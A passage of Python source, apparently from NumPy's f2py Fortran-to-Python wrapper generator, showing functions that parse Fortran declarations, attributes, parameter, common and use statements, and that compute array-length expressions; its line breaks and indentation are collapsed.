groupcache[groupcounter]['vars'][result]) # if groupcounter>1: # name is interfaced try: groupcache[groupcounter - 2]['interfaced'].append(name) except Exception: pass if block == 'function': t = typespattern[0].match(m.group('before') + ' ' + name) if t: typespec, selector, attr, edecl = cracktypespec0( t.group('this'), t.group('after')) updatevars(typespec, selector, attr, edecl) if case in ['call', 'callfun']: grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 # end routine grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 # end interface elif case == 'entry': name, args, result, bind = _resolvenameargspattern(m.group('after')) if name is not None: if args: args = rmbadname([x.strip() for x in markoutercomma(args).split('@,@')]) else: args = [] assert result is None, repr(result) groupcache[groupcounter]['entry'][name] = args previous_context = ('entry', name, groupcounter) elif case == 'type': typespec, selector, attr, edecl = cracktypespec0( block, m.group('after')) last_name = updatevars(typespec, selector, attr, edecl) if last_name is not None: previous_context = ('variable', last_name, groupcounter) elif case in ['dimension', 'intent', 'optional', 'required', 'external', 'public', 'private', 'intrinsic']: edecl = groupcache[groupcounter]['vars'] ll = m.group('after').strip() i = ll.find('::') if i < 0 and case == 'intent': i = markouterparen(ll).find('@)@') - 2 ll = ll[:i + 1] + '::' + ll[i + 1:] i = ll.find('::') if ll[i:] == '::' and 'args' in groupcache[groupcounter]: outmess('All arguments will have attribute %s%s\n' % (m.group('this'), ll[:i])) ll = ll + ','.join(groupcache[groupcounter]['args']) if i < 0: i = 0 pl = '' else: pl = ll[:i].strip() ll = ll[i + 2:] ch = markoutercomma(pl).split('@,@') if len(ch) > 1: pl = ch[0] outmess('analyzeline: cannot handle multiple attributes without type specification. Ignoring %r.\n' % ( ','.join(ch[1:]))) last_name = None for e in [x.strip() for x in markoutercomma(ll).split('@,@')]: m1 = namepattern.match(e) if not m1: if case in ['public', 'private']: k = '' else: print(m.groupdict()) outmess('analyzeline: no name pattern found in %s statement for %s. Skipping.\n' % ( case, repr(e))) continue else: k = rmbadname1(m1.group('name')) if k not in edecl: edecl[k] = {} if case == 'dimension': ap = case + m1.group('after') if case == 'intent': ap = m.group('this') + pl if _intentcallbackpattern.match(ap): if k not in groupcache[groupcounter]['args']: if groupcounter > 1: if '__user__' not in groupcache[groupcounter - 2]['name']: outmess( 'analyzeline: missing __user__ module (could be nothing)\n') # fixes ticket 1693 if k != groupcache[groupcounter]['name']: outmess('analyzeline: appending intent(callback) %s' ' to %s arguments\n' % (k, groupcache[groupcounter]['name'])) groupcache[groupcounter]['args'].append(k) else: errmess( 'analyzeline: intent(callback) %s is ignored' % (k)) else: errmess('analyzeline: intent(callback) %s is already' ' in argument list' % (k)) if case in ['optional', 'required', 'public', 'external', 'private', 'intrinsic']: ap = case if 'attrspec' in edecl[k]: edecl[k]['attrspec'].append(ap) else: edecl[k]['attrspec'] = [ap] if case == 'external': if groupcache[groupcounter]['block'] == 'program': outmess('analyzeline: ignoring program arguments\n') continue if k not in groupcache[groupcounter]['args']: continue if 'externals' not in groupcache[groupcounter]: groupcache[groupcounter]['externals'] = [] groupcache[groupcounter]['externals'].append(k) last_name = k groupcache[groupcounter]['vars'] = edecl if last_name is not None: previous_context = ('variable', last_name, groupcounter) elif case == 'parameter': edecl = groupcache[groupcounter]['vars'] ll = m.group('after').strip()[1:-1] last_name = None for e in markoutercomma(ll).split('@,@'): try: k, initexpr = [x.strip() for x in e.split('=')] except Exception: outmess( 'analyzeline: could not extract name,expr in parameter statement "%s" of "%s"\n' % (e, ll)) continue params = get_parameters(edecl) k = rmbadname1(k) if k not in edecl: edecl[k] = {} if '=' in edecl[k] and (not edecl[k]['='] == initexpr): outmess('analyzeline: Overwriting the value of parameter "%s" ("%s") with "%s".\n' % ( k, edecl[k]['='], initexpr)) t = determineexprtype(initexpr, params) if t: if t.get('typespec') == 'real': tt = list(initexpr) for m in real16pattern.finditer(initexpr): tt[m.start():m.end()] = list( initexpr[m.start():m.end()].lower().replace('d', 'e')) initexpr = ''.join(tt) elif t.get('typespec') == 'complex': initexpr = initexpr[1:].lower().replace('d', 'e').\ replace(',', '+1j*(') try: v = eval(initexpr, {}, params) except (SyntaxError, NameError, TypeError) as msg: errmess('analyzeline: Failed to evaluate %r. Ignoring: %s\n' % (initexpr, msg)) continue edecl[k]['='] = repr(v) if 'attrspec' in edecl[k]: edecl[k]['attrspec'].append('parameter') else: edecl[k]['attrspec'] = ['parameter'] last_name = k groupcache[groupcounter]['vars'] = edecl if last_name is not None: previous_context = ('variable', last_name, groupcounter) elif case == 'implicit': if m.group('after').strip().lower() == 'none': groupcache[groupcounter]['implicit'] = None elif m.group('after'): if 'implicit' in groupcache[groupcounter]: impl = groupcache[groupcounter]['implicit'] else: impl = {} if impl is None: outmess( 'analyzeline: Overwriting earlier "implicit none" statement.\n') impl = {} for e in markoutercomma(m.group('after')).split('@,@'): decl = {} m1 = re.match( r'\s*(?P<this>.*?)\s*(\(\s*(?P<after>[a-z-, ]+)\s*\)\s*|)\Z', e, re.I) if not m1: outmess( 'analyzeline: could not extract info of implicit statement part "%s"\n' % (e)) continue m2 = typespattern4implicit.match(m1.group('this')) if not m2: outmess( 'analyzeline: could not extract types pattern of implicit statement part "%s"\n' % (e)) continue typespec, selector, attr, edecl = cracktypespec0( m2.group('this'), m2.group('after')) kindselect, charselect, typename = cracktypespec( typespec, selector) decl['typespec'] = typespec decl['kindselector'] = kindselect decl['charselector'] = charselect decl['typename'] = typename for k in list(decl.keys()): if not decl[k]: del decl[k] for r in markoutercomma(m1.group('after')).split('@,@'): if '-' in r: try: begc, endc = [x.strip() for x in r.split('-')] except Exception: outmess( 'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement\n' % r) continue else: begc = endc = r.strip() if not len(begc) == len(endc) == 1: outmess( 'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement (2)\n' % r) continue for o in range(ord(begc), ord(endc) + 1): impl[chr(o)] = decl groupcache[groupcounter]['implicit'] = impl elif case == 'data': ll = [] dl = '' il = '' f = 0 fc = 1 inp = 0 for c in m.group('after'): if not inp: if c == "'": fc = not fc if c == '/' and fc: f = f + 1 continue if c == '(': inp = inp + 1 elif c == ')': inp = inp - 1 if f == 0: dl = dl + c elif f == 1: il = il + c elif f == 2: dl = dl.strip() if dl.startswith(','): dl = dl[1:].strip() ll.append([dl, il]) dl = c il = '' f = 0 if f == 2: dl = dl.strip() if dl.startswith(','): dl = dl[1:].strip() ll.append([dl, il]) vars = {} if 'vars' in groupcache[groupcounter]: vars = groupcache[groupcounter]['vars'] last_name = None for l in ll: l = [x.strip() for x in l] if l[0][0] == ',': l[0] = l[0][1:] if l[0][0] == '(': outmess( 'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % l[0]) continue i = 0 j = 0 llen = len(l[1]) for v in rmbadname([x.strip() for x in markoutercomma(l[0]).split('@,@')]): if v[0] == '(': outmess( 'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % v) # XXX: subsequent init expressions may get wrong values. # Ignoring since data statements are irrelevant for # wrapping. continue fc = 0 while (i < llen) and (fc or not l[1][i] == ','): if l[1][i] == "'": fc = not fc i = i + 1 i = i + 1 if v not in vars: vars[v] = {} if '=' in vars[v] and not vars[v]['='] == l[1][j:i - 1]: outmess('analyzeline: changing init expression of "%s" ("%s") to "%s"\n' % ( v, vars[v]['='], l[1][j:i - 1])) vars[v]['='] = l[1][j:i - 1] j = i last_name = v groupcache[groupcounter]['vars'] = vars if last_name is not None: previous_context = ('variable', last_name, groupcounter) elif case == 'common': line = m.group('after').strip() if not line[0] == '/': line = '//' + line cl = [] f = 0 bn = '' ol = '' for c in line: if c == '/': f = f + 1 continue if f >= 3: bn = bn.strip() if not bn: bn = '_BLNK_' cl.append([bn, ol]) f = f - 2 bn = '' ol = '' if f % 2: bn = bn + c else: ol = ol + c bn = bn.strip() if not bn: bn = '_BLNK_' cl.append([bn, ol]) commonkey = {} if 'common' in groupcache[groupcounter]: commonkey = groupcache[groupcounter]['common'] for c in cl: if c[0] not in commonkey: commonkey[c[0]] = [] for i in [x.strip() for x in markoutercomma(c[1]).split('@,@')]: if i: commonkey[c[0]].append(i) groupcache[groupcounter]['common'] = commonkey previous_context = ('common', bn, groupcounter) elif case == 'use': m1 = re.match( r'\A\s*(?P<name>\b[\w]+\b)\s*((,(\s*\bonly\b\s*:|(?P<notonly>))\s*(?P<list>.*))|)\s*\Z', m.group('after'), re.I) if m1: mm = m1.groupdict() if 'use' not in groupcache[groupcounter]: groupcache[groupcounter]['use'] = {} name = m1.group('name') groupcache[groupcounter]['use'][name] = {} isonly = 0 if 'list' in mm and mm['list'] is not None: if 'notonly' in mm and mm['notonly'] is None: isonly = 1 groupcache[groupcounter]['use'][name]['only'] = isonly ll = [x.strip() for x in mm['list'].split(',')] rl = {} for l in ll: if '=' in l: m2 = re.match( r'\A\s*(?P<local>\b[\w]+\b)\s*=\s*>\s*(?P<use>\b[\w]+\b)\s*\Z', l, re.I) if m2: rl[m2.group('local').strip()] = m2.group( 'use').strip() else: outmess( 'analyzeline: Not local=>use pattern found in %s\n' % repr(l)) else: rl[l] = l groupcache[groupcounter]['use'][name]['map'] = rl else: pass else: print(m.groupdict()) outmess('analyzeline: Could not crack the use statement.\n') elif case in ['f2pyenhancements']: if 'f2pyenhancements' not in groupcache[groupcounter]: groupcache[groupcounter]['f2pyenhancements'] = {} d = groupcache[groupcounter]['f2pyenhancements'] if m.group('this') == 'usercode' and 'usercode' in d: if isinstance(d['usercode'], str): d['usercode'] = [d['usercode']] d['usercode'].append(m.group('after')) else: d[m.group('this')] = m.group('after') elif case == 'multiline': if previous_context is None: if verbose: outmess('analyzeline: No context for multiline block.\n') return gc = groupcounter appendmultiline(groupcache[gc], previous_context[:2], m.group('this')) else: if verbose > 1: print(m.groupdict()) outmess('analyzeline: No code implemented for line.\n') def appendmultiline(group, context_name, ml): if 'f2pymultilines' not in group: group['f2pymultilines'] = {} d = group['f2pymultilines'] if context_name not in d: d[context_name] = [] d[context_name].append(ml) return def cracktypespec0(typespec, ll): selector = None attr = None if re.match(r'double\s*complex', typespec, re.I): typespec = 'double complex' elif re.match(r'double\s*precision', typespec, re.I): typespec = 'double precision' else: typespec = typespec.strip().lower() m1 = selectpattern.match(markouterparen(ll)) if not m1: outmess( 'cracktypespec0: no kind/char_selector pattern found for line.\n') return d = m1.groupdict() for k in list(d.keys()): d[k] = unmarkouterparen(d[k]) if typespec in ['complex', 'integer', 'logical', 'real', 'character', 'type']: selector = d['this'] ll = d['after'] i = ll.find('::') if i >= 0: attr = ll[:i].strip() ll = ll[i + 2:] return typespec, selector, attr, ll ##### namepattern = re.compile(r'\s*(?P<name>\b[\w]+\b)\s*(?P<after>.*)\s*\Z', re.I) kindselector = re.compile( r'\s*(\(\s*(kind\s*=)?\s*(?P<kind>.*)\s*\)|[*]\s*(?P<kind2>.*?))\s*\Z', re.I) charselector = re.compile( r'\s*(\((?P<lenkind>.*)\)|[*]\s*(?P<charlen>.*))\s*\Z', re.I) lenkindpattern = re.compile( r'\s*(kind\s*=\s*(?P<kind>.*?)\s*(@,@\s*len\s*=\s*(?P<len>.*)|)|(len\s*=\s*|)(?P<len2>.*?)\s*(@,@\s*(kind\s*=\s*|)(?P<kind2>.*)|))\s*\Z', re.I) lenarraypattern = re.compile( r'\s*(@\(@\s*(?!/)\s*(?P<array>.*?)\s*@\)@\s*[*]\s*(?P<len>.*?)|([*]\s*(?P<len2>.*?)|)\s*(@\(@\s*(?!/)\s*(?P<array2>.*?)\s*@\)@|))\s*(=\s*(?P<init>.*?)|(@\(@|)/\s*(?P<init2>.*?)\s*/(@\)@|)|)\s*\Z', re.I) def removespaces(expr): expr = expr.strip() if len(expr) <= 1: return expr expr2 = expr[0] for i in range(1, len(expr) - 1): if (expr[i] == ' ' and ((expr[i + 1] in "()[]{}=+-/* ") or (expr[i - 1] in "()[]{}=+-/* "))): continue expr2 = expr2 + expr[i] expr2 = expr2 + expr[-1] return expr2 def markinnerspaces(line): l = '' f = 0 cc = '\'' cb = '' for c in line: if cb == '\\' and c in ['\\', '\'', '"']: l = l + c cb = c continue if f == 0 and c in ['\'', '"']: cc = c if c == cc: f = f + 1 elif c == cc: f = f - 1 elif c == ' ' and f == 1: l = l + '@_@' continue l = l + c cb = c return l def updatevars(typespec, selector, attrspec, entitydecl): global groupcache, groupcounter last_name = None kindselect, charselect, typename = cracktypespec(typespec, selector) if attrspec: attrspec = [x.strip() for x in markoutercomma(attrspec).split('@,@')] l = [] c = re.compile(r'(?P<start>[a-zA-Z]+)') for a in attrspec: if not a: continue m = c.match(a) if m: s = m.group('start').lower() a = s + a[len(s):] l.append(a) attrspec = l el = [x.strip() for x in markoutercomma(entitydecl).split('@,@')] el1 = [] for e in el: for e1 in [x.strip() for x in markoutercomma(removespaces(markinnerspaces(e)), comma=' ').split('@ @')]: if e1: el1.append(e1.replace('@_@', ' ')) for e in el1: m = namepattern.match(e) if not m: outmess( 'updatevars: no name pattern found for entity=%s. Skipping.\n' % (repr(e))) continue ename = rmbadname1(m.group('name')) edecl = {} if ename in groupcache[groupcounter]['vars']: edecl = groupcache[groupcounter]['vars'][ename].copy() not_has_typespec = 'typespec' not in edecl if not_has_typespec: edecl['typespec'] = typespec elif typespec and (not typespec == edecl['typespec']): outmess('updatevars: attempt to change the type of "%s" ("%s") to "%s". Ignoring.\n' % ( ename, edecl['typespec'], typespec)) if 'kindselector' not in edecl: edecl['kindselector'] = copy.copy(kindselect) elif kindselect: for k in list(kindselect.keys()): if k in edecl['kindselector'] and (not kindselect[k] == edecl['kindselector'][k]): outmess('updatevars: attempt to change the kindselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % ( k, ename, edecl['kindselector'][k], kindselect[k])) else: edecl['kindselector'][k] = copy.copy(kindselect[k]) if 'charselector' not in edecl and charselect: if not_has_typespec: edecl['charselector'] = charselect else: errmess('updatevars:%s: attempt to change empty charselector to %r. Ignoring.\n' % (ename, charselect)) elif charselect: for k in list(charselect.keys()): if k in edecl['charselector'] and (not charselect[k] == edecl['charselector'][k]): outmess('updatevars: attempt to change the charselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % ( k, ename, edecl['charselector'][k], charselect[k])) else: edecl['charselector'][k] = copy.copy(charselect[k]) if 'typename' not in edecl: edecl['typename'] = typename elif typename and (not edecl['typename'] == typename): outmess('updatevars: attempt to change the typename of "%s" ("%s") to "%s". Ignoring.\n' % ( ename, edecl['typename'], typename)) if 'attrspec' not in edecl: edecl['attrspec'] = copy.copy(attrspec) elif attrspec: for a in attrspec: if a not in edecl['attrspec']: edecl['attrspec'].append(a) else: edecl['typespec'] = copy.copy(typespec) edecl['kindselector'] = copy.copy(kindselect) edecl['charselector'] = copy.copy(charselect) edecl['typename'] = typename edecl['attrspec'] = copy.copy(attrspec) if m.group('after'): m1 = lenarraypattern.match(markouterparen(m.group('after'))) if m1: d1 = m1.groupdict() for lk in ['len', 'array', 'init']: if d1[lk + '2'] is not None: d1[lk] = d1[lk + '2'] del d1[lk + '2'] for k in list(d1.keys()): if d1[k] is not None: d1[k] = unmarkouterparen(d1[k]) else: del d1[k] if 'len' in d1 and 'array' in d1: if d1['len'] == '': d1['len'] = d1['array'] del d1['array'] else: d1['array'] = d1['array'] + ',' + d1['len'] del d1['len'] errmess('updatevars: "%s %s" is mapped to "%s %s(%s)"\n' % ( typespec, e, typespec, ename, d1['array'])) if 'array' in d1: dm = 'dimension(%s)' % d1['array'] if 'attrspec' not in edecl or (not edecl['attrspec']): edecl['attrspec'] = [dm] else: edecl['attrspec'].append(dm) for dm1 in edecl['attrspec']: if dm1[:9] == 'dimension' and dm1 != dm: del edecl['attrspec'][-1] errmess('updatevars:%s: attempt to change %r to %r. Ignoring.\n' % (ename, dm1, dm)) break if 'len' in d1: if typespec in ['complex', 'integer', 'logical', 'real']: if ('kindselector' not in edecl) or (not edecl['kindselector']): edecl['kindselector'] = {} edecl['kindselector']['*'] = d1['len'] elif typespec == 'character': if ('charselector' not in edecl) or (not edecl['charselector']): edecl['charselector'] = {} if 'len' in edecl['charselector']: del edecl['charselector']['len'] edecl['charselector']['*'] = d1['len'] if 'init' in d1: if '=' in edecl and (not edecl['='] == d1['init']): outmess('updatevars: attempt to change the init expression of "%s" ("%s") to "%s". Ignoring.\n' % ( ename, edecl['='], d1['init'])) else: edecl['='] = d1['init'] else: outmess('updatevars: could not crack entity declaration "%s". Ignoring.\n' % ( ename + m.group('after'))) for k in list(edecl.keys()): if not edecl[k]: del edecl[k] groupcache[groupcounter]['vars'][ename] = edecl if 'varnames' in groupcache[groupcounter]: groupcache[groupcounter]['varnames'].append(ename) last_name = ename return last_name def cracktypespec(typespec, selector): kindselect = None charselect = None typename = None if selector: if typespec in ['complex', 'integer', 'logical', 'real']: kindselect = kindselector.match(selector) if not kindselect: outmess( 'cracktypespec: no kindselector pattern found for %s\n' % (repr(selector))) return kindselect = kindselect.groupdict() kindselect['*'] = kindselect['kind2'] del kindselect['kind2'] for k in list(kindselect.keys()): if not kindselect[k]: del kindselect[k] for k, i in list(kindselect.items()): kindselect[k] = rmbadname1(i) elif typespec == 'character': charselect = charselector.match(selector) if not charselect: outmess( 'cracktypespec: no charselector pattern found for %s\n' % (repr(selector))) return charselect = charselect.groupdict() charselect['*'] = charselect['charlen'] del charselect['charlen'] if charselect['lenkind']: lenkind = lenkindpattern.match( markoutercomma(charselect['lenkind'])) lenkind = lenkind.groupdict() for lk in ['len', 'kind']: if lenkind[lk + '2']: lenkind[lk] = lenkind[lk + '2'] charselect[lk] = lenkind[lk] del lenkind[lk + '2'] del charselect['lenkind'] for k in list(charselect.keys()): if not charselect[k]: del charselect[k] for k, i in list(charselect.items()): charselect[k] = rmbadname1(i) elif typespec == 'type': typename = re.match(r'\s*\(\s*(?P<name>\w+)\s*\)', selector, re.I) if typename: typename = typename.group('name') else: outmess('cracktypespec: no typename found in %s\n' % (repr(typespec + selector))) else: outmess('cracktypespec: no selector used for %s\n' % (repr(selector))) return kindselect, charselect, typename ###### def setattrspec(decl, attr, force=0): if not decl: decl = {} if not attr: return decl if 'attrspec' not in decl: decl['attrspec'] = [attr] return decl if force: decl['attrspec'].append(attr) if attr in decl['attrspec']: return decl if attr == 'static' and 'automatic' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr == 'automatic' and 'static' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr == 'public': if 'private' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr == 'private': if 'public' not in decl['attrspec']: decl['attrspec'].append(attr) else: decl['attrspec'].append(attr) return decl def setkindselector(decl, sel, force=0): if not decl: decl = {} if not sel: return decl if 'kindselector' not in decl: decl['kindselector'] = sel return decl for k in list(sel.keys()): if force or k not in decl['kindselector']: decl['kindselector'][k] = sel[k] return decl def setcharselector(decl, sel, force=0): if not decl: decl = {} if not sel: return decl if 'charselector' not in decl: decl['charselector'] = sel return decl for k in list(sel.keys()): if force or k not in decl['charselector']: decl['charselector'][k] = sel[k] return decl def getblockname(block, unknown='unknown'): if 'name' in block: return block['name'] return unknown # post processing def setmesstext(block): global filepositiontext try: filepositiontext = 'In: %s:%s\n' % (block['from'], block['name']) except Exception: pass def get_usedict(block): usedict = {} if 'parent_block' in block: usedict = get_usedict(block['parent_block']) if 'use' in block: usedict.update(block['use']) return usedict def get_useparameters(block, param_map=None): global f90modulevars if param_map is None: param_map = {} usedict = get_usedict(block) if not usedict: return param_map for usename, mapping in list(usedict.items()): usename = usename.lower() if usename not in f90modulevars: outmess('get_useparameters: no module %s info used by %s\n' % (usename, block.get('name'))) continue mvars = f90modulevars[usename] params = get_parameters(mvars) if not params: continue # XXX: apply mapping if mapping: errmess('get_useparameters: mapping for %s not impl.' % (mapping)) for k, v in list(params.items()): if k in param_map: outmess('get_useparameters: overriding parameter %s with' ' value from module %s' % (repr(k), repr(usename))) param_map[k] = v return param_map def postcrack2(block, tab='', param_map=None): global f90modulevars if not f90modulevars: return block if isinstance(block, list): ret = [postcrack2(g, tab=tab + '\t', param_map=param_map) for g in block] return ret setmesstext(block) outmess('%sBlock: %s\n' % (tab, block['name']), 0) if param_map is None: param_map = get_useparameters(block) if param_map is not None and 'vars' in block: vars = block['vars'] for n in list(vars.keys()): var = vars[n] if 'kindselector' in var: kind = var['kindselector'] if 'kind' in kind: val = kind['kind'] if val in param_map: kind['kind'] = param_map[val] new_body = [postcrack2(b, tab=tab + '\t', param_map=param_map) for b in block['body']] block['body'] = new_body return block def postcrack(block, args=None, tab=''): """ TODO: function return values determine expression types if in argument list """ global usermodules, onlyfunctions if isinstance(block, list): gret = [] uret = [] for g in block: setmesstext(g) g = postcrack(g, tab=tab + '\t') # sort user routines to appear first if 'name' in g and '__user__' in g['name']: uret.append(g) else: gret.append(g) return uret + gret setmesstext(block) if not isinstance(block, dict) and 'block' not in block: raise Exception('postcrack: Expected block dictionary instead of ' + str(block)) if 'name' in block and not block['name'] == 'unknown_interface': outmess('%sBlock: %s\n' % (tab, block['name']), 0) block = analyzeargs(block) block = analyzecommon(block) block['vars'] = analyzevars(block) block['sortvars'] = sortvarnames(block['vars']) if 'args' in block and block['args']: args = block['args'] block['body'] = analyzebody(block, args, tab=tab) userisdefined = [] if 'use' in block: useblock = block['use'] for k in list(useblock.keys()): if '__user__' in k: userisdefined.append(k) else: useblock = {} name = '' if 'name' in block: name = block['name'] # and not userisdefined: # Build a __user__ module if 'externals' in block and block['externals']: interfaced = [] if 'interfaced' in block: interfaced = block['interfaced'] mvars = copy.copy(block['vars']) if name: mname = name + '__user__routines' else: mname = 'unknown__user__routines' if mname in userisdefined: i = 1 while '%s_%i' % (mname, i) in userisdefined: i = i + 1 mname = '%s_%i' % (mname, i) interface = {'block': 'interface', 'body': [], 'vars': {}, 'name': name + '_user_interface'} for e in block['externals']: if e in interfaced: edef = [] j = -1 for b in block['body']: j = j + 1 if b['block'] == 'interface': i = -1 for bb in b['body']: i = i + 1 if 'name' in bb and bb['name'] == e: edef = copy.copy(bb) del b['body'][i] break if edef: if not b['body']: del block['body'][j] del interfaced[interfaced.index(e)] break interface['body'].append(edef) else: if e in mvars and not isexternal(mvars[e]): interface['vars'][e] = mvars[e] if interface['vars'] or interface['body']: block['interfaced'] = interfaced mblock = {'block': 'python module', 'body': [ interface], 'vars': {}, 'name': mname, 'interfaced': block['externals']} useblock[mname] = {} usermodules.append(mblock) if useblock: block['use'] = useblock return block def sortvarnames(vars): indep = [] dep = [] for v in list(vars.keys()): if 'depend' in vars[v] and vars[v]['depend']: dep.append(v) else: indep.append(v) n = len(dep) i = 0 while dep: # XXX: How to catch dependence cycles correctly? v = dep[0] fl = 0 for w in dep[1:]: if w in vars[v]['depend']: fl = 1 break if fl: dep = dep[1:] + [v] i = i + 1 if i > n: errmess('sortvarnames: failed to compute dependencies because' ' of cyclic dependencies between ' + ', '.join(dep) + '\n') indep = indep + dep break else: indep.append(v) dep = dep[1:] n = len(dep) i = 0 return indep def analyzecommon(block): if not hascommon(block): return block commonvars = [] for k in list(block['common'].keys()): comvars = [] for e in block['common'][k]: m = re.match( r'\A\s*\b(?P<name>.*?)\b\s*(\((?P<dims>.*?)\)|)\s*\Z', e, re.I) if m: dims = [] if m.group('dims'): dims = [x.strip() for x in markoutercomma(m.group('dims')).split('@,@')] n = rmbadname1(m.group('name').strip()) if n in block['vars']: if 'attrspec' in block['vars'][n]: block['vars'][n]['attrspec'].append( 'dimension(%s)' % (','.join(dims))) else: block['vars'][n]['attrspec'] = [ 'dimension(%s)' % (','.join(dims))] else: if dims: block['vars'][n] = { 'attrspec': ['dimension(%s)' % (','.join(dims))]} else: block['vars'][n] = {} if n not in commonvars: commonvars.append(n) else: n = e errmess( 'analyzecommon: failed to extract "<name>[(<dims>)]" from "%s" in common /%s/.\n' % (e, k)) comvars.append(n) block['common'][k] = comvars if 'commonvars' not in block: block['commonvars'] = commonvars else: block['commonvars'] = block['commonvars'] + commonvars return block def analyzebody(block, args, tab=''): global usermodules, skipfuncs, onlyfuncs, f90modulevars setmesstext(block) body = [] for b in block['body']: b['parent_block'] = block if b['block'] in ['function', 'subroutine']: if args is not None and b['name'] not in args: continue else: as_ = b['args'] if b['name'] in skipfuncs: continue if onlyfuncs and b['name'] not in onlyfuncs: continue b['saved_interface'] = crack2fortrangen( b, '\n' + ' ' * 6, as_interface=True) else: as_ = args b = postcrack(b, as_, tab=tab + '\t') if b['block'] == 'interface' and not b['body']: if 'f2pyenhancements' not in b: continue if b['block'].replace(' ', '') == 'pythonmodule': usermodules.append(b) else: if b['block'] == 'module': f90modulevars[b['name']] = b['vars'] body.append(b) return body def buildimplicitrules(block): setmesstext(block) implicitrules = defaultimplicitrules attrrules = {} if 'implicit' in block: if block['implicit'] is None: implicitrules = None if verbose > 1: outmess( 'buildimplicitrules: no implicit rules for routine %s.\n' % repr(block['name'])) else: for k in list(block['implicit'].keys()): if block['implicit'][k].get('typespec') not in ['static', 'automatic']: implicitrules[k] = block['implicit'][k] else: attrrules[k] = block['implicit'][k]['typespec'] return implicitrules, attrrules def myeval(e, g=None, l=None): """ Like `eval` but returns only integers and floats """ r = eval(e, g, l) if type(r) in [int, float]: return r raise ValueError('r=%r' % (r)) getlincoef_re_1 = re.compile(r'\A\b\w+\b\Z', re.I) def getlincoef(e, xset): # e = a*x+b ; x in xset """ Obtain ``a`` and ``b`` when ``e == "a*x+b"``, where ``x`` is a symbol in xset. >>> getlincoef('2*x + 1', {'x'}) (2, 1, 'x') >>> getlincoef('3*x + x*2 + 2 + 1', {'x'}) (5, 3, 'x') >>> getlincoef('0', {'x'}) (0, 0, None) >>> getlincoef('0*x', {'x'}) (0, 0, 'x') >>> getlincoef('x*x', {'x'}) (None, None, None) This can be tricked by sufficiently complex expressions >>> getlincoef('(x - 0.5)*(x - 1.5)*(x - 1)*x + 2*x + 3', {'x'}) (2.0, 3.0, 'x') """ try: c = int(myeval(e, {}, {})) return 0, c, None except Exception: pass if getlincoef_re_1.match(e): return 1, 0, e len_e = len(e) for x in xset: if len(x) > len_e: continue if re.search(r'\w\s*\([^)]*\b' + x + r'\b', e): # skip function calls having x as an argument, e.g max(1, x) continue re_1 = re.compile(r'(?P<before>.*?)\b' + x + r'\b(?P<after>.*)', re.I) m = re_1.match(e) if m: try: m1 = re_1.match(e) while m1: ee = '%s(%s)%s' % ( m1.group('before'), 0, m1.group('after')) m1 = re_1.match(ee) b = myeval(ee, {}, {}) m1 = re_1.match(e) while m1: ee = '%s(%s)%s' % ( m1.group('before'), 1, m1.group('after')) m1 = re_1.match(ee) a = myeval(ee, {}, {}) - b m1 = re_1.match(e) while m1: ee = '%s(%s)%s' % ( m1.group('before'), 0.5, m1.group('after')) m1 = re_1.match(ee) c = myeval(ee, {}, {}) # computing another point to be sure that expression is linear m1 = re_1.match(e) while m1: ee = '%s(%s)%s' % ( m1.group('before'), 1.5, m1.group('after')) m1 = re_1.match(ee) c2 = myeval(ee, {}, {}) if (a * 0.5 + b == c and a * 1.5 + b == c2): # gh-8062: return integers instead of floats if possible. try: a = int(a) except: pass try: b = int(b) except: pass return a, b, x except Exception: pass break return None, None, None _varname_match = re.compile(r'\A[a-z]\w*\Z').match def getarrlen(dl, args, star='*'): """ Parameters ---------- dl : sequence of two str objects dimensions of the array args : Iterable[str] symbols used in the expression star : Any unused Returns ------- expr : str Some numeric expression as a string arg : Optional[str] If understood, the argument from `args` present in `expr` expr2 : Optional[str] If understood, an expression fragment that should be used as ``"(%s%s".format(something, expr2)``. Examples -------- >>> getarrlen(['10*x + 20', '40*x'], {'x'}) ('30 * x - 19', 'x', '+19)/(30)') >>> getarrlen(['1', '10*x + 20'], {'x'}) ('10 * x + 20', 'x', '-20)/(10)') >>> getarrlen(['10*x + 20', '1'], {'x'}) ('-10 * x - 18', 'x', '+18)/(-10)') >>> getarrlen(['20', '1'], {'x'}) ('-18', None, None) """ edl = [] try: edl.append(myeval(dl[0], {}, {})) except Exception: edl.append(dl[0]) try: edl.append(myeval(dl[1], {}, {})) except Exception: edl.append(dl[1]) if isinstance(edl[0], int): p1 = 1 - edl[0] if p1 == 0: d = str(dl[1]) elif p1 < 0: d = '%s-%s' % (dl[1], -p1) else: d = '%s+%s' % (dl[1], p1) elif isinstance(edl[1], int): p1 = 1 + edl[1] if p1 == 0: d = '-(%s)' % (dl[0]) else: d = '%s-(%s)' % (p1, dl[0]) else: d = '%s-(%s)+1' % (dl[1], dl[0]) try: return repr(myeval(d, {}, {})), None, None except Exception: pass d1, d2 = getlincoef(dl[0], args), getlincoef(dl[1], args) if None not in [d1[0], d2[0]]: if (d1[0], d2[0]) == (0, 0): return repr(d2[1] - d1[1] + 1), None, None b = d2[1] - d1[1] + 1 d1 = (d1[0], 0, d1[2]) d2 = (d2[0], b, d2[2]) if d1[0] == 0 and d2[2] in args: if b < 0: return '%s * %s - %s' % (d2[0], d2[2], -b), d2[2], '+%s)/(%s)' % (-b, d2[0]) elif b: return '%s * %s + %s' % (d2[0], d2[2], b), d2[2], '-%s)/(%s)' % (b, d2[0]) else: return '%s * %s' % (d2[0], d2[2]), d2[2], ')/(%s)' % (d2[0]) if d2[0] == 0 and d1[2] in args: if b < 0: return '%s * %s - %s' % (-d1[0], d1[2], -b), d1[2], '+%s)/(%s)' % (-b, -d1[0]) elif b: return '%s * %s + %s' % (-d1[0], d1[2], b), d1[2], '-%s)/(%s)' % (b, -d1[0]) else: return '%s * %s' % (-d1[0], d1[2]), d1[2], ')/(%s)' % (-d1[0]) if d1[2] == d2[2] and d1[2] in args: a = 